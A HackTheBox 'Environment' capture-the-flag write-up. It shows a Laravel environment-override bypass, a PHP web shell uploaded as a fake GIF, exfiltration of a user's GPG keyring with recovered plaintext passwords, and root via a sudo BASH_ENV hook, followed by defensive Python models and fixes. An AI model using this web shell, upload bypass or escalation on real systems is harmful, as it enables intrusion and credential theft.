Environment

The document outlines a penetration test of the environment.htb server (a HackTheBox machine). It lists the exposed services (SSH and HTTP), abuses a Laravel environment-override vulnerability (CVE-2024-52301) to reach the dashboard of the user 'hish', uploads a web shell disguised as a GIF to get command execution as www-data, decrypts a GPG keyvault with hish's copied keyring to recover his password, and finally escalates to root through a sudo rule that keeps BASH_ENV in the environment.

Uploaded by 21r21a6238

Environment

Nmap scan report for environment.htb (10.10.11.67)


Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 5c:02:33:95:ef:44:e2:80:cd:3a:96:02:23:f1:92:64 (ECDSA)
|_ 256 1f:3d:c2:19:55:28:a1:77:59:51:48:10:c4:4b:74:ab (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Save the Environment | environment.htb
|_http-server-header: nginx/1.22.1
8000/tcp open http-alt?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo "10.10.11.67 environment.htb" | sudo tee -a /etc/hosts

gobuster dir -u http://environment.htb/ -w /usr/share/wordlists/dirb/common.txt


/build (Status: 301) [Size: 169] [--> http://environment.htb/build/]
/favicon.ico (Status: 200) [Size: 0]
/index.php (Status: 200) [Size: 4602]
/logout (Status: 302) [Size: 358] [--> http://environment.htb/login]
/login (Status: 200) [Size: 2391]
/robots.txt (Status: 200) [Size: 24]
/storage (Status: 301) [Size: 169] [--> http://environment.htb/storage/]
/up (Status: 200) [Size: 2126]
/vendor (Status: 301) [Size: 169] [--> http://environment.htb/vendor/]

Go to the login page. Sending a malformed remember parameter (&remember=') makes the application throw an error whose debug output discloses the environment name: preprod.

https://github.com/Nyamort/CVE-2024-52301
CVE-2024-52301 lets a web request choose the Laravel environment through the query string. With this PoC: go to the login page, submit random credentials, intercept the POST request, append ?--env=preprod to the URL and forward it.
The application then redirects you straight to the dashboard of the user Hish.
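Added illustration of why appending ?--env=preprod works; this is not the PoC's code nor Laravel's, but a Python model of the two pieces that combine in CVE-2024-52301 (assumptions: PHP with register_argc_argv=On fills $_SERVER['argv'] from the query string split on '+', and Laravel's environment detector honours a --env argument from that array in every SAPI, while the patched releases, 11.31.0 on the 11.x line, only consult argv in the console). The practical check on a target: the override only works when register_argc_argv is On and the framework is unpatched, so it is worth testing both with a harmless environment name first.

```python
# Added illustration (not the PoC's or Laravel's own code): models why
# "?--env=preprod" changes the application environment.
CONSOLE_SAPIS = {"cli", "phpdbg"}


def php_argv_from_query_string(query_string: str) -> list[str]:
    """Model of PHP's register_argc_argv=On in a web SAPI (fpm-fcgi, apache2handler):
    $_SERVER['argv'] becomes QUERY_STRING split on '+', with no URL decoding and no
    script name in argv[0] (assumption modelled on php_build_argv in main/main.c).
    Note that '+' is the separator; a '&' stays inside one argument."""
    if not query_string:
        return []
    return query_string.split("+")


def environment_argument(argv: list[str]):
    """Model of Laravel's EnvironmentDetector::getEnvironmentArgument: the first
    '--env VALUE' or '--env=VALUE' entry wins (assumed port of the framework logic)."""
    for i, value in enumerate(argv):
        if value == "--env":
            return argv[i + 1] if i + 1 < len(argv) else None
        if value.startswith("--env") and "=" in value:
            return value.split("=", 1)[1]
    return None


def detect_environment(sapi: str, query_string: str, app_env: str, patched: bool) -> str:
    """Vulnerable path: argv is consulted in every SAPI, so a web request overrides
    APP_ENV. Patched path (assumed behaviour of the fixed releases): argv is only
    consulted when PHP runs in the console, where it is the real command line."""
    argv = php_argv_from_query_string(query_string)
    if patched and sapi not in CONSOLE_SAPIS:
        argv = []
    override = environment_argument(argv)
    return override if override is not None else app_env


if __name__ == "__main__":
    for qs in ("--env=preprod", "page=1+--env=preprod", "email=a&password=b"):
        print(f"{qs!r:32} vulnerable={detect_environment('fpm-fcgi', qs, 'production', False)!r:12} "
              f"patched={detect_environment('fpm-fcgi', qs, 'production', True)!r}")
```

Mitigation on the PHP side is register_argc_argv=Off in the web SAPI's php.ini; on the framework side it is upgrading to a fixed release, since the application code that branches on the environment name cannot tell the two sources apart.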

Save the web shell below as shell.gif.php. (note the trailing dot after php).

IMPORTANT: two things make the upload pass the filter: the dot after php, and the header of an allowed file type (GIF87a) as the first line.
Go to the profile section and upload it:

GIF87a
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="cmd" id="cmd" size="80">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>
document.getElementById("cmd").focus();
</script>
</html>
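Added illustration, not the Environment application's own upload code: a Python model of the kind of weak filter that the shell.gif.php. trick defeats (deny-list on the last extension plus trust in the magic bytes; this is an assumption about the filter, the page only shows that the trick works), next to a hardened validator that normalises the name before checking, allows exactly one extension from an allow-list, requires the magic bytes to match that extension, and never stores the file under the client-supplied name.

```python
# Added illustration (not the Environment app's own code): why "shell.gif.php." with a
# GIF header can slip past a weak upload filter, beside a hardened check.
import os
import secrets

# extension -> accepted magic bytes (constructed allow-list for the example)
ALLOWED = {"jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
           "png": (b"\x89PNG\r\n\x1a\n",), "gif": (b"GIF87a", b"GIF89a")}
SCRIPT_EXTS = {"php", "php3", "php5", "phtml", "phar"}


def php_pathinfo_extension(name: str) -> str:
    """Mimics PHP pathinfo($name, PATHINFO_EXTENSION): text after the last dot of the
    basename, '' when there is no dot or the dot is the last character."""
    base = name.rsplit("/", 1)[-1]
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1]


def weak_validate(name: str, data: bytes) -> bool:
    """Assumed weak filter: deny-list on the last extension, trust the magic bytes.
    'shell.gif.php.' has an empty last extension, so the deny-list never fires, and
    the GIF87a prefix satisfies the content check."""
    if php_pathinfo_extension(name).lower() in SCRIPT_EXTS:
        return False
    return any(data.startswith(m) for magics in ALLOWED.values() for m in magics)


def hardened_validate(name: str, data: bytes):
    """Returns (accepted, stored_name). Strips trailing dots and spaces before looking
    at the extension, allows exactly one extension from the allow-list, requires the
    magic bytes to match that extension, and stores under a server-generated name."""
    base = os.path.basename(name.replace("\\", "/")).rstrip(". ")
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, None          # no extension, or a double extension like a.php.gif
    ext = parts[1]
    if ext not in ALLOWED or not any(data.startswith(m) for m in ALLOWED[ext]):
        return False, None          # unknown type, or content does not match the type
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # constructed sample: the page's trick, a GIF header followed by PHP
    shell = b"GIF87a\n<?php system($_GET['cmd']); ?>"
    print("weak     :", weak_validate("shell.gif.php.", shell))
    print("hardened :", hardened_validate("shell.gif.php.", shell))
```

Even with the hardened check, the upload directory should be served without a PHP handler and with execution disabled, so a polyglot that passes every content check still cannot run.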

You will get a shell as www-data:

cat /home/hish/user.txt

bash-5.2$ ls /home/hish
backup user.txt
bash-5.2$ ls /home/hish/backup/
keyvault.gpg

# on the target (www-data shell): expose hish's backup over HTTP
cd /home/hish/backup
python3 -m http.server 8080

# on the attacker machine
wget 10.10.11.67:8080/keyvault.gpg

# on the target: hish's GPG keyring is readable by www-data as well, so pack it up
cd /home/hish
tar -czf /tmp/gnupg.tar.gz ./.gnupg
cd /tmp
python3 -m http.server 8080

# on the attacker machine
wget 10.10.11.67:8080/gnupg.tar.gz
tar -xzf gnupg.tar.gz
mv ~/.gnupg ~/Documents # save our own .gnupg
mv .gnupg ~/ # use hish's keyring as our own (gpg --homedir ./.gnupg --decrypt keyvault.gpg does the same without the swap)
gpg --decrypt keyvault.gpg
gpg: WARNING: unsafe permissions on homedir
gpg: encrypted with rsa2048 key, ID B755B0EDD6CFCFD3, created 2025-01-11
"hish_ <hish@environment.htb>"
PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!

The ENVIRONMENT.HTB entry is hish's SSH password:

ssh hish@10.10.11.67
marineSPm@ster!!

For Root

-bash-5.2$ sudo -l
Matching Defaults entries for hish on environment:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo

sudo keeps BASH_ENV (env_keep), and /usr/bin/systeminfo is a bash script (verify with head -1 /usr/bin/systeminfo), so the non-interactive bash that sudo starts sources whatever file BASH_ENV points to, as root, before the first line of the script:

echo -e '#!/bin/bash\nchmod +s /bin/bash' > root.sh
chmod 777 root.sh
sudo BASH_ENV=root.sh /usr/bin/systeminfo

/bin/bash -p   # -p keeps the setuid root effective uid instead of dropping it
cat /root/root.txt
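Added illustration, not from the page: a Python audit of sudo -l / sudoers text for env_keep entries that let a caller inject code into a program run as root, and a local reproduction of the BASH_ENV hook without sudo, so the mechanism can be checked before it is used. The sudo -l text is the page's own output, constructed here as a sample; the list of dangerous variables is an assumption of the example.

```python
# Added illustration (not from the page): (1) audit env_keep for interpreter-hijacking
# variables, (2) reproduce the BASH_ENV hook locally, without sudo.
import os
import re
import subprocess
import tempfile

# variables that change what an interpreter does before the target program runs
# (assumed list for the example)
DANGEROUS_KEEP = {"BASH_ENV", "ENV", "LD_PRELOAD", "LD_LIBRARY_PATH", "PERL5OPT",
                  "PYTHONPATH", "PYTHONINSPECT"}

# constructed sample: the sudo -l output shown on this page
SUDO_L_SAMPLE = (
    "Matching Defaults entries for hish on environment:\n"
    "    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin"
    "\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin, env_keep+=\"ENV BASH_ENV\", use_pty\n"
    "User hish may run the following commands on environment:\n"
    "    (ALL) /usr/bin/systeminfo\n"
)


def dangerous_env_keep(sudoers_text: str) -> set[str]:
    """Return the env_keep variables in sudo -l / sudoers text that are dangerous.
    Handles  env_keep+="ENV BASH_ENV"  (quoted list) and  env_keep+=VAR  (bare)."""
    found = set()
    for m in re.finditer(r'env_keep\s*\+?=\s*(?:"([^"]*)"|([^\s,]+))', sudoers_text):
        found.update((m.group(1) or m.group(2)).split())
    return found & DANGEROUS_KEEP


def bash_env_hook_fires(script_body: str = "uname -a\n") -> bool:
    """Run a stand-in for /usr/bin/systeminfo under bash with BASH_ENV pointing at a
    hook file. Non-interactive bash sources that file before the script's first line;
    the function returns True if the hook ran. Under sudo with env_keep BASH_ENV the
    same thing happens as root, which is the whole privilege escalation."""
    with tempfile.TemporaryDirectory() as d:
        hook = os.path.join(d, "root.sh")
        marker = os.path.join(d, "hook-ran")
        script = os.path.join(d, "systeminfo")
        with open(hook, "w") as f:
            f.write(f'touch "{marker}"\n')   # in the real attack: chmod +s /bin/bash
        with open(script, "w") as f:
            f.write("#!/bin/bash\n" + script_body)
        env = {**os.environ, "BASH_ENV": hook}
        subprocess.run(["bash", script], env=env, check=True, capture_output=True)
        return os.path.exists(marker)


if __name__ == "__main__":
    print("dangerous env_keep:", sorted(dangerous_env_keep(SUDO_L_SAMPLE)))
    print("BASH_ENV hook ran :", bash_env_hook_fires())
```

The fix is to drop the env_keep += "ENV BASH_ENV" line from sudoers: with env_reset (already set here) sudo strips BASH_ENV by itself, and the systeminfo rule becomes as safe as the script it runs.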
